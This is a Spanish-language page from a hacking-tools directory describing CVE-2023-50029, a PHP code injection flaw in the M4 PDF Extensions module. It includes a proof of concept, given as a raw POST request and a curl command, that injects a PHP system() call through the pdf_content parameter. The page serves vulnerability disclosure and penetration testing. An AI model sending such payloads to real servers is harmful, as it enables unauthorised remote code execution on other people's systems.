Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PHP-Injection-in-M4-PDF-Extensions — CVE-2023-50029: Vulnerabilidad de Inyección PHP en M4 PDF Extensions Module | Kitploit
Herramientas/GitHubGitHub/absholi7ly/php-injection-in-m4-pdf-extensions
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubabsholi7ly/php-injection-in-m4-pdf-extensions

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029: Vulnerabilidad de Inyección PHP en M4 PDF Extensions Module

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029 es una vulnerabilidad de inyección PHP en el módulo M4 PDF Extensions. Esta vulnerabilidad permite a los atacantes inyectar y ejecutar código PHP arbitrario en el servidor, lo que les otorga control total sobre el sistema objetivo. El problema radica en la validación incorrecta de las entradas, lo que permite que código malicioso sea pasado a través de parámetros de usuario.

Poc

root@kitploit:~
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

pdf_content=<?php system('uname -a'); ?>

O Curl

root@kitploit:~
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
Descargar herramienta